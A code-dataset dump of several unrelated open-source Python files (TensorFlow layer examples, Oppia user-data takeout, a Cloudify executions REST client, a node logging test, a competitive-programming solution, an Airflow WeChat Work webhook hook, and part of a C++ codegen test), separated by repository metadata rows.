                shape=[int(input_shape[-1]), self.num_outputs]
            )

        def call(self, inputs):
            return tf.matmul(inputs, self.kernel)

    layer = MyDenseLayer(10)
    _ = layer(tf.zeros([10, 5])) # Calling the layer `.builds` it.

    logger.info('layer.trainable_variables:')
    print([var.name for var in layer.trainable_variables])

args.step = auto_increment(args.step, args.all)
### Step #3 - Models: Composing layers
if args.step == 3:
    print("\n### Step #3 - Models: Composing layers")

    class ResnetIdentityBlock(tf.keras.Model):
        """ResNet identity block: three conv/batch-norm stages plus a skip
        connection added before the final ReLU."""
        def __init__(self, kernel_size, filters):
            super(ResnetIdentityBlock, self).__init__(name='')
            filters1, filters2, filters3 = filters

            self.conv2a = tf.keras.layers.Conv2D(filters1, (1, 1))
            self.bn2a = tf.keras.layers.BatchNormalization()

            self.conv2b = tf.keras.layers.Conv2D(filters2, kernel_size, padding='same')
            self.bn2b = tf.keras.layers.BatchNormalization()

            self.conv2c = tf.keras.layers.Conv2D(filters3, (1, 1))
            self.bn2c = tf.keras.layers.BatchNormalization()

        def call(self, input_tensor, training=False):
            x = self.conv2a(input_tensor)
            x = self.bn2a(x, training=training)
            x = tf.nn.relu(x)

            x = self.conv2b(x)
            x = self.bn2b(x, training=training)
            x = tf.nn.relu(x)

            x = self.conv2c(x)
            x = self.bn2c(x, training=training)

            # Skip connection: requires filters3 to match the input channels.
            x += input_tensor
            return tf.nn.relu(x)

    block = ResnetIdentityBlock(1, [1, 2, 3])
    _ = block(tf.zeros([1, 2, 3, 3]))

    logger.info('block.layers:')
    print(*[layer for layer in block.layers], sep='\n')
    logger.info(f'len(block.variables): {len(block.variables)}')
    block.summary()

    # The same stack expressed with the Sequential API (no skip connection).
    my_seq = tf.keras.Sequential([
        tf.keras.layers.Conv2D(1, (1, 1), input_shape=(None, None, 3)),
        tf.keras.layers.BatchNormalization(),
        tf.keras.layers.Conv2D(2, 1, padding='same'),
        tf.keras.layers.BatchNormalization(),
        tf.keras.layers.Conv2D(3, (1, 1)),
        tf.keras.layers.BatchNormalization()
    ])

    logger.info('my_seq(tf.zeros([1, 2, 3, 3])):')
    print(my_seq(tf.zeros([1, 2, 3, 3])), '\n')
    my_seq.summary()

### End of File
print()
if args.plot:
    plt.show()
debug()
| 30.840764 | 87 | 0.633622 |
cba4661b0b5213db3a22e576eb73cf6308f4ba03 | 5,262 | py | Python | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | 1 | 2021-12-17T15:21:23.000Z | 2021-12-17T15:21:23.000Z | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | core/domain/takeout_service.py | yash10019coder/oppia | 8c349c61ac723a2fd507046b20957934cba70e3a | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to export the data of all user related models from a given
user_id.
"""
from __future__ import annotations
import json
import logging
import re
from core import feconf
from core.domain import takeout_domain
from core.domain import user_services
from core.platform import models
# Bind the storage model modules used by takeout; presumably
# Registry.import_models returns them in the same order as the NAMES
# requested, matching this tuple unpacking -- TODO confirm.
(
    base_models, collection_models, email_models,
    exploration_models, feedback_models, topic_models,
    suggestion_models, user_models) = models.Registry.import_models(
        [models.NAMES.base_model, models.NAMES.collection, models.NAMES.email,
         models.NAMES.exploration, models.NAMES.feedback, models.NAMES.topic,
         models.NAMES.suggestion, models.NAMES.user])
def get_models_which_should_be_exported():
    """Returns list of models to export.

    Returns:
        list(datastore_services.Model). List of models whose data should be
        exported.
    """
    # Abstract base classes that never hold user data directly; a set gives
    # O(1) membership checks.
    exempt_base_classes = {
        'BaseCommitLogEntryModel',
        'BaseMapReduceBatchResultsModel',
        'BaseModel',
        'BaseSnapshotContentModel',
        'BaseSnapshotMetadataModel',
        'VersionedModel',
    }

    return [model_class for model_class in
            models.Registry.get_all_storage_model_classes()
            if model_class.get_model_association_to_user() !=
            base_models.MODEL_ASSOCIATION_TO_USER.NOT_CORRESPONDING_TO_USER and
            model_class.__name__ not in exempt_base_classes]
def export_data_for_user(user_id):
    """Exports selected models according to model defined export_data
    functions.

    Args:
        user_id: str. The user_id of the user whose data is being exported.

    Returns:
        TakeoutData. Contains the exported data dictionary (one
            '<model_name>_data' key per model, formatted per each model's
            export policy) and the list of image files that were separated
            out of it.

    Raises:
        NotImplementedError. Takeout for profile users is not implemented.
    """
    user_settings = user_services.get_user_settings(user_id)
    if user_settings is not None and (
            feconf.ROLE_ID_MOBILE_LEARNER in user_settings.roles):
        raise NotImplementedError(
            'Takeout for profile users is not yet supported.')

    exported_data = {}
    models_to_export = get_models_which_should_be_exported()
    for model in models_to_export:
        # Split the PascalCase class name into words, dropping the trailing
        # 'Model' word (e.g. 'UserSettingsModel' -> ['User', 'Settings']).
        split_name = re.findall('[A-Z][^A-Z]*', model.__name__)[:-1]
        exported_model_data = model.export_data(user_id)
        # Audit check: no raw user IDs may leak into exported JSON.
        exported_model_data_json_string = json.dumps(exported_model_data)
        user_id_match_object = re.search(
            feconf.USER_ID_REGEX, exported_model_data_json_string)
        if user_id_match_object:
            logging.error(
                '[TAKEOUT] User ID (%s) found in the JSON generated '
                'for %s and user with ID %s' % (
                    user_id_match_object.group(0), model.__name__, user_id
                )
            )
        # Join the split name with underscores and add _data for final name.
        final_name = ('_').join([x.lower() for x in split_name])
        exported_data[final_name] = exported_model_data

    # Separate out images. We store the images that need to be separated here
    # as a dictionary mapping tuples to strings. The tuple value indicates the
    # "path" to take to the image in the user's data dictionary, and the string
    # indicates the filename that the exported image will be saved to.
    replacement_instructions = [
        takeout_domain.TakeoutImageReplacementInstruction(
            ('user_settings', 'profile_picture_data_url'),
            'user_settings_profile_picture.png',
            'profile_picture_filename'
        )
    ]
    takeout_image_files = []
    for replacement_instruction in replacement_instructions:
        dictionary_path = replacement_instruction.dictionary_path
        replacement_filename = replacement_instruction.export_filename
        replacement_key = replacement_instruction.new_key

        # Move pointer to the position indicated by the tuple.
        pointer = exported_data
        for key in dictionary_path[:-1]:
            pointer = pointer[key]

        # Swap out data with replacement filename.
        image_key = dictionary_path[-1]
        image_data = pointer[image_key]
        if image_data is not None:
            takeout_image_files.append(
                takeout_domain.TakeoutImage(image_data, replacement_filename))
        pointer[image_key] = replacement_filename

        # Rename the key.
        pointer[replacement_key] = pointer.pop(image_key)

    return takeout_domain.TakeoutData(exported_data, takeout_image_files)
aec7d7cfb8c57fe87b8eb85cb4a0ce98e4bddb01 | 11,884 | py | Python | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | cloudify_rest_client/executions.py | michailj/cloudify-common | dfc83adbd9ec6f07539445ca5d7008fa733bed03 | [
"Apache-2.0"
] | null | null | null | ########
# Copyright (c) 2014-2019 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from cloudify_rest_client.responses import ListResponse
class Execution(dict):
    """A Cloudify workflow execution, exposed as a dict with typed accessors."""

    TERMINATED = 'terminated'
    FAILED = 'failed'
    CANCELLED = 'cancelled'
    PENDING = 'pending'
    STARTED = 'started'
    CANCELLING = 'cancelling'
    FORCE_CANCELLING = 'force_cancelling'
    KILL_CANCELLING = 'kill_cancelling'
    QUEUED = 'queued'
    SCHEDULED = 'scheduled'
    END_STATES = [TERMINATED, FAILED, CANCELLED]

    def __init__(self, execution):
        self.update(execution)
        current_status = self.get('status')
        if current_status:
            # Pre-4.4 managers don't send status_display; fall back to the
            # raw status for compatibility.
            self.setdefault('status_display', current_status)

    @property
    def id(self):
        """The execution's id."""
        return self.get('id')

    @property
    def deployment_id(self):
        """The id of the deployment this execution belongs to."""
        return self.get('deployment_id')

    @property
    def blueprint_id(self):
        """The id of the deployment's main blueprint."""
        return self.get('blueprint_id')

    @property
    def status(self):
        """The execution's status."""
        return self.get('status')

    @property
    def status_display(self):
        """The human-readable form of the execution's status."""
        return self.get('status_display')

    @property
    def error(self):
        """The execution error in case of failure, otherwise None."""
        return self.get('error')

    @property
    def workflow_id(self):
        """The id of the workflow this execution represents."""
        return self.get('workflow_id')

    @property
    def parameters(self):
        """The execution's parameters (an empty dict when unset)."""
        return self.get('parameters') or {}

    @property
    def is_system_workflow(self):
        """Whether the executed workflow is a system workflow."""
        return self.get('is_system_workflow', False)

    @property
    def created_at(self):
        """The execution creation time."""
        return self.get('created_at')

    @property
    def started_at(self):
        """The execution start time."""
        return self.get('started_at')

    @property
    def ended_at(self):
        """The execution end time."""
        return self.get('ended_at')

    @property
    def created_by(self):
        """The name of the execution creator."""
        return self.get('created_by')

    @property
    def scheduled_for(self):
        """The time this execution is scheduled for, if any."""
        return self.get('scheduled_for')

    @property
    def is_dry_run(self):
        """Whether the execution was performed as a dry run."""
        return self.get('is_dry_run', False)
class ExecutionsClient(object):
    """REST client for the manager's /executions endpoints."""

    def __init__(self, api):
        # `api` is the low-level HTTP client used to issue requests.
        self.api = api
        self._uri_prefix = 'executions'
        self._wrapper_cls = Execution

    def _create_filters(
            self,
            deployment_id=None,
            include_system_workflows=False,
            sort=None,
            is_descending=False,
            **kwargs
    ):
        """Build the query-parameter dict shared by list requests."""
        params = {'_include_system_workflows': include_system_workflows}
        if deployment_id:
            params['deployment_id'] = deployment_id
        params.update(kwargs)
        if sort:
            # A leading '-' requests descending order from the REST service.
            params['_sort'] = '-' + sort if is_descending else sort
        return params

    def should_start(self, execution_id):
        """
        Check if an execution can currently start running (no system exeuctions
        / executions under the same deployment are currently running).

        :param execution_id: Id of the executions that needs to be checked.
        :return: Whether or not this execution can currently start
        """
        assert execution_id
        uri = '/{self._uri_prefix}/{id}/should-start'.format(
            self=self, id=execution_id)
        response = self.api.get(uri)
        return response

    def list(self, _include=None, **kwargs):
        """Returns a list of executions.

        :param deployment_id: Optional deployment id to get executions for.
        :param include_system_workflows: Include executions of system
               workflows
        :param _include: List of fields to include in response.
        :param sort: Key for sorting the list.
        :param is_descending: True for descending order, False for ascending.
        :param kwargs: Optional filter fields. For a list of available fields
               see the REST service's models.Execution.fields
        :return: Executions list.
        """
        params = self._create_filters(**kwargs)
        response = self.api.get(
            '/{self._uri_prefix}'.format(self=self),
            params=params,
            _include=_include)
        return ListResponse(
            [self._wrapper_cls(item) for item in response['items']],
            response['metadata']
        )

    def get(self, execution_id, _include=None):
        """Get execution by its id.

        :param execution_id: Id of the execution to get.
        :param _include: List of fields to include in response.
        :return: Execution.
        """
        assert execution_id
        uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
        response = self.api.get(uri, _include=_include)
        return self._wrapper_cls(response)

    def update(self, execution_id, status, error=None):
        """Update execution with the provided status and optional error.

        :param execution_id: Id of the execution to update.
        :param status: Updated execution status.
        :param error: Updated execution error (optional).
        :return: Updated execution.
        """
        # NOTE(review): this method hard-codes '/executions' and the
        # Execution wrapper instead of using _uri_prefix/_wrapper_cls like
        # the other methods -- presumably equivalent, but inconsistent.
        uri = '/executions/{0}'.format(execution_id)
        params = {'status': status}
        if error:
            params['error'] = error
        response = self.api.patch(uri, data=params)
        return Execution(response)

    def start(self, deployment_id, workflow_id, parameters=None,
              allow_custom_parameters=False, force=False, dry_run=False,
              queue=False, schedule=None, wait_after_fail=600):
        """Starts a deployment's workflow execution whose id is provided.

        :param deployment_id: The deployment's id to execute a workflow for.
        :param workflow_id: The workflow to be executed id.
        :param parameters: Parameters for the workflow execution.
        :param allow_custom_parameters: Determines whether to allow\
        parameters which weren't defined in the workflow parameters schema\
        in the blueprint.
        :param force: Determines whether to force the execution of the\
        workflow in a case where there's an already running execution for\
        this deployment.
        :param dry_run: If set to true, no actual actions will be performed.\
        This is a dry run of the execution
        :param queue: If set, blocked executions will be queued and
        automatically run when possible
        :param schedule: A string representing the date and time this
        workflow should be executed at. If not passed this workflow will be
        executed immediately.
        :param wait_after_fail: How long (seconds) to wait after a failure.
        :raises: IllegalExecutionParametersError
        :return: The created execution.
        """
        assert deployment_id
        assert workflow_id
        # Booleans are serialized as lowercase strings for the REST API.
        data = {
            'deployment_id': deployment_id,
            'workflow_id': workflow_id,
            'parameters': parameters,
            'allow_custom_parameters': str(allow_custom_parameters).lower(),
            'force': str(force).lower(),
            'dry_run': str(dry_run).lower(),
            'queue': str(queue).lower(),
            'scheduled_time': schedule,
            'wait_after_fail': wait_after_fail
        }
        uri = '/executions'
        response = self.api.post(uri,
                                 data=data,
                                 expected_status_code=201)
        return Execution(response)

    def cancel(self, execution_id, force=False, kill=False):
        """Cancels the execution which matches the provided execution id.

        :param execution_id: Id of the execution to cancel.
        :param force: Boolean describing whether to send a 'cancel' or a 'force-cancel' action # NOQA
        :param kill: If set, send a 'kill' action (takes precedence over force).
        :return: Cancelled execution.
        """
        uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
        action = 'kill' if kill else 'force-cancel' if force else 'cancel'
        response = self.api.post(uri,
                                 data={'action': action},
                                 expected_status_code=200)
        return self._wrapper_cls(response)

    def resume(self, execution_id, force=False):
        """Resume an execution.

        :param execution_id: Id of the execution to resume.
        :param force: Whether to resume failed/cancelled executions by
                      retrying their failed tasks.
        :return: Resumed execution.
        """
        uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
        action = 'force-resume' if force else 'resume'
        response = self.api.post(uri,
                                 data={'action': action},
                                 expected_status_code=200)
        return self._wrapper_cls(response)

    def requeue(self, execution_id):
        """
        Requeue an execution (e.g. after snapshot restore).

        :param execution_id: Id of the execution to be requeued.
        :return: Requeued execution.
        """
        uri = '/{self._uri_prefix}/{id}'.format(self=self, id=execution_id)
        response = self.api.post(uri,
                                 data={'action': 'requeue'},
                                 expected_status_code=200)
        return self._wrapper_cls(response)

    def delete(self, to_datetime=None, keep_last=None, **kwargs):
        """Deletes finished executions from the DB.

        :param to_datetime: Until which timestamp to delete executions
        :param keep_last: How many most recent executions to keep from deletion
        :param kwargs: Optional filter fields. For a list of available fields
               see the REST service's models.Execution.fields
        :return: List of deleted executions.

        Parameters `to_datetime` and `keep_last` are mutually-exclusive.
        """
        # NOTE(review): the mutual exclusivity of to_datetime/keep_last is
        # documented but not enforced here -- presumably validated
        # server-side; TODO confirm.
        data = {}
        if to_datetime:
            data['to_datetime'] = to_datetime.isoformat()
        if keep_last:
            data['keep_last'] = keep_last
        response = self.api.delete('/{self._uri_prefix}'.format(self=self),
                                   data=data,
                                   params=kwargs,
                                   expected_status_code=200)
        # The service returns a single item holding the deleted count.
        return response['items'][0]['count']
| 34.546512 | 102 | 0.601313 |
7a41e499308001fc20b42aeeaaec516d7f458cb7 | 2,468 | py | Python | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | test/functional/feature_logging.py | puzcoin/SyndicateQT | d49ebc0f0ba554bb41efb377b8c5bbc238677379 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Syndicate Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test debug logging."""
import os
from test_framework.test_framework import SyndicateTestFramework
class LoggingTest(SyndicateTestFramework):
    """Functional test for the -debuglogfile option.

    Covers: the default debug.log location, alternative relative and absolute
    log file names, and the init error raised when the log file's parent
    directory does not exist (plus success once it is created).
    """
    def set_test_params(self):
        # A single node on a clean chain is enough to exercise logging options.
        self.num_nodes = 1
        self.setup_clean_chain = True
    def run_test(self):
        # test default log file name
        assert os.path.isfile(os.path.join(self.nodes[0].datadir, "regtest", "debug.log"))
        # test alternative log file name in datadir
        self.restart_node(0, ["-debuglogfile=foo.log"])
        assert os.path.isfile(os.path.join(self.nodes[0].datadir, "regtest", "foo.log"))
        # test alternative log file name outside datadir
        tempname = os.path.join(self.options.tmpdir, "foo.log")
        self.restart_node(0, ["-debuglogfile=%s" % tempname])
        assert os.path.isfile(tempname)
        # check that invalid log (relative) will cause error
        # (relative paths resolve inside the datadir's regtest subdirectory)
        invdir = os.path.join(self.nodes[0].datadir, "regtest", "foo")
        invalidname = os.path.join("foo", "foo.log")
        self.stop_node(0)
        self.assert_start_raises_init_error(0, ["-debuglogfile=%s" % (invalidname)],
                                            "Error: Could not open debug log file")
        assert not os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (relative) works after path exists
        self.stop_node(0)
        os.mkdir(invdir)
        self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
        assert os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (absolute) will cause error
        self.stop_node(0)
        invdir = os.path.join(self.options.tmpdir, "foo")
        invalidname = os.path.join(invdir, "foo.log")
        self.assert_start_raises_init_error(0, ["-debuglogfile=%s" % invalidname],
                                            "Error: Could not open debug log file")
        assert not os.path.isfile(os.path.join(invdir, "foo.log"))
        # check that invalid log (absolute) works after path exists
        self.stop_node(0)
        os.mkdir(invdir)
        self.start_node(0, ["-debuglogfile=%s" % (invalidname)])
        assert os.path.isfile(os.path.join(invdir, "foo.log"))
# Standard functional-test entry point.
if __name__ == '__main__':
    LoggingTest().main()
| 41.133333 | 90 | 0.636548 |
20829b16795378ba0e9ebb47dd6ddc4cbb65bb11 | 779 | py | Python | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | 1 | 2018-11-12T15:18:55.000Z | 2018-11-12T15:18:55.000Z | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | null | null | null | atcoder/corp/codefes2017_q1_c.py | knuu/competitive-programming | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | [
"MIT"
] | null | null | null | from collections import Counter
# CODE FESTIVAL 2017 qual, problem C: decide whether the H x W grid of
# letters read from stdin can be rearranged so that every row and every
# column is a palindrome; prints "Yes" or "No".
# NOTE(review): problem identity inferred from the file name and the mod-4
# frequency bookkeeping below — confirm against the original task statement.
H, W = map(int, input().split())
# Classify letter frequencies:
#   counts divisible by 4 fill the four-way symmetric quadrant cells,
#   cnt2 counts leftover symmetric pairs (count == 2 mod 4),
#   cnt1 counts letters with an odd count (each needs a centre cell).
# cnt4 is declared for symmetry but never incremented — the % 4 == 0 branch
# simply continues.
cnt4, cnt2, cnt1 = 0, 0, 0
for v in Counter(''.join(input() for _ in range(H))).values():
    if v % 4 == 0:
        continue
    elif v % 2 == 0:
        cnt2 += 1
    else:
        cnt1 += 1
        # An odd count v leaves a spare pair beyond the centre cell whenever
        # (v - 1) is not a multiple of 4 (e.g. v == 3).
        if (v - 1) % 4 != 0:
            cnt2 += 1
# Number of odd dimensions determines how many centre rows/columns exist.
odd = (H % 2 == 1) + (W % 2 == 1)
if odd == 2:
    # Odd H and odd W: the centre cell absorbs at most one odd letter and the
    # centre row + centre column hold up to (H + W - 2) // 2 leftover pairs.
    if cnt1 <= 1 and cnt2 <= (H + W - 2) // 2:
        print("Yes")
    else:
        print("No")
elif odd == 1 and H % 2 == 1:
    # Only a centre row: no centre cell, pairs must fit in W // 2 slots.
    if cnt1 == 0 and cnt2 <= W // 2:
        print("Yes")
    else:
        print("No")
elif odd == 1 and W % 2 == 1:
    # Only a centre column: no centre cell, pairs must fit in H // 2 slots.
    if cnt1 == 0 and cnt2 <= H // 2:
        print("Yes")
    else:
        print("No")
else:
    # Even H and even W: every letter count must be a multiple of 4.
    if cnt1 == 0 and cnt2 == 0:
        print("Yes")
    else:
        print("No")
| 22.911765 | 62 | 0.428755 |
83184529a978685665cadcadfb79fdd10e2d603a | 5,275 | py | Python | airflow/contrib/hooks/qyweixin_hook.py | zzmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2019-08-21T07:30:14.000Z | 2019-08-21T07:30:14.000Z | airflow/contrib/hooks/qyweixin_hook.py | zzmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 6 | 2020-07-07T20:21:26.000Z | 2021-09-29T17:29:29.000Z | airflow/contrib/hooks/qyweixin_hook.py | langzi-zmg/airflow-dingding-qyweixin-1.10.3 | 8ebb5f80362df94996e5aa297299e7ff46a6f540 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import requests
from airflow import AirflowException
from airflow.hooks.http_hook import HttpHook
class QyweixinHook(HttpHook):
    """
    This hook allows you to send enterprise WeChat (qyweixin) messages using a
    qyweixin custom bot.

    The webhook token is read from ``conn_id.password``. Prefer setting the
    API domain in ``conn_id.host``; otherwise the default
    ``https://qyapi.weixin.qq.com`` is used.

    :param qyweixin_conn_id: The name of the qyweixin connection to use
    :type qyweixin_conn_id: str
    :param message_type: Message type you want to send to qyweixin, five types
        are supported so far: text, link, markdown, actionCard, feedCard
    :type message_type: str
    :param message: The message sent to the qyweixin chat group. A plain string
        for ``text``; for the other types, the payload dict the API expects.
    :type message: str or dict
    :param mentioned_list: Userids to remind in the group ("@all" for everyone)
    :type mentioned_list: list[str]
    :param mentioned_mobile_list: Mobile numbers to remind in the group
    :type mentioned_mobile_list: list[str]
    """
    def __init__(self,
                 qyweixin_conn_id='qyweixin_default',
                 message_type='text',
                 message=None,
                 mentioned_list=None,
                 mentioned_mobile_list=None,
                 *args,
                 **kwargs
                 ):
        super(QyweixinHook, self).__init__(http_conn_id=qyweixin_conn_id, *args, **kwargs)
        self.message_type = message_type
        self.message = message
        self.mentioned_list = mentioned_list
        self.mentioned_mobile_list = mentioned_mobile_list
    def _get_endpoint(self):
        """
        Build the qyweixin webhook endpoint (path + key) for sending a message.

        :raises AirflowException: if the connection carries no token (password)
        """
        conn = self.get_connection(self.http_conn_id)
        token = conn.password
        if not token:
            # Fixed garbled error text ("is requests but get nothing").
            raise AirflowException('qyweixin token is required but got nothing, '
                                   'check your conn_id configuration.')
        return 'cgi-bin/webhook/send?key={}'.format(token)
    def _build_message(self):
        """
        Build the JSON payload for the configured qyweixin message type.

        As the most commonly used type, a text message only needs the plain
        content string; it is wrapped into ``{'content': ...}`` here. For
        markdown (and all other types) the caller supplies the payload dict.
        """
        if self.message_type in ['text', 'markdown']:
            if self.message_type == 'text':
                payload = {'content': self.message}
            else:
                # markdown callers already pass the payload dict themselves
                payload = self.message
            data = {
                'msgtype': self.message_type,
                self.message_type: payload,
                'at': {
                    'mentioned_list': self.mentioned_list,
                    'mentioned_mobile_list': self.mentioned_mobile_list
                }
            }
        else:
            data = {
                'msgtype': self.message_type,
                self.message_type: self.message
            }
        return json.dumps(data)
    def get_conn(self, headers=None):
        """
        Overwrite HttpHook get_conn because we only need base_url and headers,
        not the generic connection parameters.

        :param headers: additional headers to be passed through as a dictionary
        :type headers: dict
        """
        conn = self.get_connection(self.http_conn_id)
        self.base_url = conn.host if conn.host else 'https://qyapi.weixin.qq.com'
        session = requests.Session()
        if headers:
            session.headers.update(headers)
        return session
    def send(self):
        """
        Send the configured qyweixin message.

        :raises ValueError: if the message type is not supported
        :raises AirflowException: if the webhook reports failure
        """
        support_type = ['text', 'link', 'markdown', 'actionCard', 'feedCard']
        if self.message_type not in support_type:
            raise ValueError('qyweixinWebhookHook only support {} '
                             'so far, but receive {}'.format(support_type, self.message_type))
        data = self._build_message()
        self.log.info('Sending qyweixin type %s message %s', self.message_type, data)
        resp = self.run(endpoint=self._get_endpoint(),
                        data=data,
                        headers={'Content-Type': 'application/json'})
        # A successful send is reported with errcode equal to 0. A missing
        # errcode is treated as failure instead of crashing on int(None).
        errcode = resp.json().get('errcode')
        if errcode is None or int(errcode) != 0:
            # BUG FIX: actually interpolate the response text; previously the
            # '%s' placeholder and resp.text were passed as two separate
            # exception args and never formatted.
            raise AirflowException('Send qyweixin message failed, receive error '
                                   'message %s' % resp.text)
        self.log.info('Success Send qyweixin message')
| 39.365672 | 94 | 0.627109 |
f11d1040ca03d38ad6cd97a93dd79acde2b3ab5d | 9,286 | py | Python | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | messages/compiler/cpp/test_cppgen.py | sync-bft/concord-clone | fcc5a454ca16446f04351676f330df2382699929 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import math
import os
import random
import sys
from pprint import pprint
sys.path.append("..")
import cppgen
import cmfc
from exceptions import CmfParseError
from visitor import Visitor
from walker import Walker
MAX_SIZE = 5
OUTPUT_DIR = 'TEST_OUTPUT'
def randint():
    """Return a random integer in [0, 100], rendered as a decimal string."""
    value = random.randint(0, 100)
    return str(value)
def randstring():
    """Return one of a fixed set of short words as a quoted C++ string literal."""
    words = ["a", "b", "c", "aa", "bb", "cc", "abcdef"]
    return '"{}"'.format(random.choice(words))
def byte_example():
    """Return a fixed C++ initializer list used for bytes-typed fields."""
    return "{0,1,2,3,4,5}"
def instance_name(msg_name, id):
    """Generate the name of an instance from a msg name, e.g. ('Foo', 2) -> '_foo2'."""
    return "_{}{}".format(msg_name.lower(), id)
def test_name(msg_name):
"""Generate the name of a serialization unit test given a message name"""
return "test_{}_serialization".format(msg_name)
def type_instance_from_variable_instance(variable_instance):
    """
    Take a generated variable instance and extract just the instance and type name for use inline
    in other message instances, e.g. 'Foo _foo0{1,2};' -> 'Foo{1,2}'.
    """
    # The type name is everything up to the first space of the declaration.
    type_name, _, _ = variable_instance.partition(' ')
    # Keep the initializer braces, dropping the variable name and the
    # trailing semicolon.
    initializer = variable_instance[variable_instance.index('{'):-1]
    return type_name + initializer
class InstanceVisitor(Visitor):
    """
    A visitor that generates instantiation of generated types along with serialization and
    deserialization code.

    Each walk over the AST appends one C++ aggregate-initializer string per
    message to ``existing_instances``; earlier instances are reused when a
    message references another message.
    """
    def __init__(self):
        # How many elements to generate for nested types.
        # This really isn't supported yet...
        self.size = 0
        # A dict keyed by a msg name that contains a set of generated instances of various sizes as strings
        # This dict should be maintained across all instantiatiions of a single visitor
        self.existing_instances = dict()
        # The current msg name of the instance being generated
        self.msg_name = ''
        # The current msg instance being generated as a string
        self.instance = ''
    # Open a new C++ variable declaration, e.g. "Foo _foo0{".
    def msg_start(self, name, id):
        self.msg_name = name
        self.instance = f'{name} {instance_name(name, self.size)}{{'
        if not name in self.existing_instances:
            self.existing_instances[name] = []
    # Close the initializer ("};") and archive the finished instance string.
    def msg_end(self):
        self.instance += '};'
        self.existing_instances[self.msg_name].append(self.instance)
        self.msg_name = ''
        self.instance = ''
    def field_start(self, name, type):
        pass
    def field_end(self):
        self.instance += ","
    # --- scalar leaves: append a random C++ literal for the field value ---
    def bool(self):
        self.instance += random.choice(["true", "false"])
    def uint8(self):
        self.instance += randint()
    def uint16(self):
        self.instance += randint()
    def uint32(self):
        self.instance += randint()
    def uint64(self):
        self.instance += randint()
    def int8(self):
        self.instance += randint()
    def int16(self):
        self.instance += randint()
    def int32(self):
        self.instance += randint()
    def int64(self):
        self.instance += randint()
    def string(self):
        self.instance += randstring()
    def bytes(self):
        self.instance += byte_example()
    # Embed a previously generated instance of the referenced message type.
    def msgname_ref(self, name):
        variable_instance = random.choice(self.existing_instances[name])
        self.instance += type_instance_from_variable_instance(
            variable_instance)
    # --- container punctuation (initializer-list braces and separators) ---
    def kvpair_start(self):
        self.instance += "{"
    def kvpair_key_end(self):
        self.instance += ","
    def kvpair_end(self):
        self.instance += "}"
    def list_start(self):
        self.instance += "{"
    def list_end(self):
        self.instance += "}"
    # Map instances are tricky to generate. Uniform initialization of maps is done by lists of
    # std::pairs, which themselves are represented as initializer lists. For this reason, we
    # actually need to know when a map starts and ends so we can generate `self.size` numbers
    # of std::pair initializer lists internally. This is further made complicated by the fact
